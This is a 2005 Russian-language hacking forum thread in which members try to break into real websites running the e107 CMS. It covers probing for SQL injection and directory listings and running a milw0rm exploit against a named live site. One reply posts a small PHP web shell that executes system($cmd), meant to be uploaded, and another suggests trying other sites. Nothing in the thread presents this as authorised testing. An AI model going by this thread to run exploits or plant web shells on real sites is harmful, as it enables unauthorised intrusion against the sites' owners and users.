движок от http://www.e107.ru/

движок от http://www.e107.ru/

09.10.2005, 16:20

Tikson

Постоянный

Регистрация: 09.10.2005

Сообщений: 333

С нами: 10834946

Репутация: 74

движок от http://www.e107.ru/

Хотелеось бы ипытать его на прочность
я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен...
первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории :
e107_admin,e107_docs,e107_files,e107_handlers,e107 _images,e107_languages,e107_plugins,e107_themes
но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config
так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так http://www.sait.net/e107_plugins/aut...�ой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более...
и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1

𝕏 Twitter Reddit Telegram Копировать ссылку

09.10.2005, 18:07

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

Tikson, в след. раз пиши так, чтобы твой урл не был реальным сайтом..) например,
http://[example]/e107_plagins/etc..

Теперь по теме.
Вот тебе 2 эксплоита).
http://milw0rm.com/id.php?id=1106
http://milw0rm.com/id.php?id=704

Последний раз редактировалось Azazel; 04.12.2005 в 17:27..

09.10.2005, 18:17

Tikson

Постоянный

Регистрация: 09.10.2005

Сообщений: 333

С нами: 10834946

Репутация: 74

Rebz спасибо =)))
ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =)
СПАСИБО!!!

09.10.2005, 18:58

Tikson

Постоянный

Регистрация: 09.10.2005

Сообщений: 333

С нами: 10834946

Репутация: 74

Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704
есть вопрос что значит "b4d upload!!"
я все делал как в сплоите написано
perl 1\e107.pl www.nradio.ru
1 - это папка в которой у меня лежит сплоит
и вмне значит выводится сообщение
## www.nradio.ru
## b4d upload!!

что это начит??? и как от этого танцевать????

09.10.2005, 19:55

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..

09.10.2005, 20:10

Kond4r

Участник форума

Регистрация: 27.09.2005

Сообщений: 103

С нами: 10851852

Репутация: 3

Помоему та стоит закачка файла с адреса http://www.lapropinacultural.com.ar/...sert_image.php
но выдаётся какая-то ошибка....
Попробуй зафигачь свой и в файле пропиши
<?
echo "<pre>";
sysem($cmd);
echo "</pre>";
?>

Мож получится.

09.10.2005, 20:26

Tikson

Постоянный

Регистрация: 09.10.2005

Сообщений: 333

С нами: 10834946

Репутация: 74

это в картинке можно писать??? там вообщето нельзя фаилы закачивать

09.10.2005, 21:12

Kond4r

Участник форума

Регистрация: 27.09.2005

Сообщений: 103

С нами: 10851852

Репутация: 3

http://nradio-ru.mitos.ru/e107_handl...ger/images.php
картинку удалить у меня не получилось((( может дело в этом

09.10.2005, 21:13

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

Да... возможно, они на папочку upload поставили права не 777. -)
В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).